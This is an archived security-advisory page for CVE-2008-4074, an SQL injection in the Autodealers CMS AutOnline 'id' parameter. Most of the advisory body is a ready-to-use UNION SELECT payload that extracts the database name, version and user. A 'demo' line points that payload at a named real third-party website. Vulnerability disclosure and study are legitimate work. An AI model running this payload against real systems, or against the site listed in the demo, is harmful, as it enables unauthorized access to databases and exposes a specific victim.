|
|
| Details : SecurityAlert |
|
|
Topic : | Autodealers CMS AutOnline (id) SQL Injection Vulnerability
|
SecurityAlert : 4247
CVE : CVE-2008-4074
CWE : CWE-89
SecurityRisk : High (About)
Remote Exploit : Yes
Local Exploit : No
Victim interaction required : No
Exploit Given : No
Credit : ZoRLu
Published : 16.09.2008
Affected Software : | zanfi_solutions:autodealers_cms_autonline |
 Advisory Text : ###########################################################################
#################################
[+] Autodealers CMS AutOnline (id) SQL Injection Vulnerability
[+] Discovered By ZoRLu
[+] home: z0rlu.blogspot.com & yildirimordulari.org & r00tsecurity.org &
darkc0de.org
[+] Greetz: str0ke, FaLCaTa, ProgenTR, Ryu, Phantom Orchid, edish, SON-KRAL
& all Muslims HaCkeRs
[+] trt-turk@hotmail.co & zorlu@w.cn
###########################################################################
#################################
[+]
[+]
[+]
[+]
exploit:
http://localhost/script_path/index.php?page=detail&id=[SQL]
[+]
[+]
[+]
[+]
[SQL]=
ZoRLu'%20union%20select%20null,concat(database(),0x3a,version(),0x3a,user()
),null,concat(database(),0x3a,version(),0x3a,user()),null,null,null,null,nu
ll/*
[+]
[+]
[+]
[+]
[+]
demo:
http://www.aartsvastgoed.nl/aankoopvastgoed/index.php?page=detail&id=ZoRLu'
%20union%20select%20null,concat(database(),0x3a,version(),0x3a,user()),null
,concat(database(),0x3a,version(),0x3a,user()),null,null,null,null,null/*
[+]
[+]
[+]
[+]
###########################################################################
#################################
References :
http://xforce.iss.net/xforce/xfdb/45049
http://www.securityfocus.com/bid/31137
http://www.milw0rm.com/exploits/6433
Feedback :
If you have additional information or notice any errors regarding this security advisory, please use contact form or email us at info()securityreason()com.
|
|
|
|